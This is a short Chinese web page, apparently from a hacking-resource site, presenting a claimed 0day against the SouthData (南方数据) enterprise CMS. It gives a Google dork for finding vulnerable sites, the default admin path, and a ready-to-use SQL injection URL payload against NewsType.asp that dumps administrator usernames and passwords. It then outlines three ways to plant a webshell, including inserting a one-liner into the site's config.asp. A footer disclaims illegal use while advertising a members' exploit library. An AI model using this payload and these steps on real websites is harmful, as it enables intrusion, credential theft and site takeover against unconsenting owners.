南方数据企业0day漏洞爆后台密码
南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:
NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp
这里只讲常见的几种,具体还是要看实际过程而定。
常见问题FAQ
- 下载须知:
- 所有工具以及资源来自网络收集,所有下载,仅供学习交流。禁止利用从本站点下载的工具进行非法活动,从事危害国家网络安全等行为,请遵守相关法律规定,如有违反与本站无关。
- 会员的作用是什么?
- 本站会上线exp漏洞库与最新0day供会员下载